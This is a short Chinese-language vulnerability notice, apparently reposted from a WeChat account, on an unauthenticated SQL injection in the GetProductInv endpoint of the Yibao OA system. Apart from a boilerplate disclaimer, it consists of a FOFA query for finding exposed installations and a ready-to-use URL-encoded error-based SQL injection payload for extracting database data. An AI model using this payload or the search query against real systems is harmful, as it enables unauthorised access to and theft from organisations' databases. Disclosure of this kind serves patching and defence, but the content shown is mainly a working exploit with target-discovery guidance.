易宝OA-GetProductInv存在SQL注入漏洞

免责声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。

漏洞描述

易宝OA-GetProductInv存在SQL注入漏洞，未授权的攻击者可通过此漏洞获取数据库敏感信息。

资产测绘

FOFA：app="顶讯科技-易宝OA系统"

漏洞复现

http://ip/SmartTradeScan/Inventory/GetProductInv?boxNoName=1%27%20AND%201411%20IN%20(SELECT%20(CHAR(113)%2bCHAR(98)%2bCHAR(112)%2bCHAR(112)%2bCHAR(113)%2b(SELECT%20(CASE%20WHEN%20(1411=1411)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2bCHAR(113)%2bCHAR(120)%2bCHAR(122)%2bCHAR(122)%2bCHAR(113)))–%20YyAm&positionName=2&productID=3&opeID=4

原文始发于微信公众号（漏洞文库）：【漏洞复现】易宝OA-GetProductInv存在SQL注入漏洞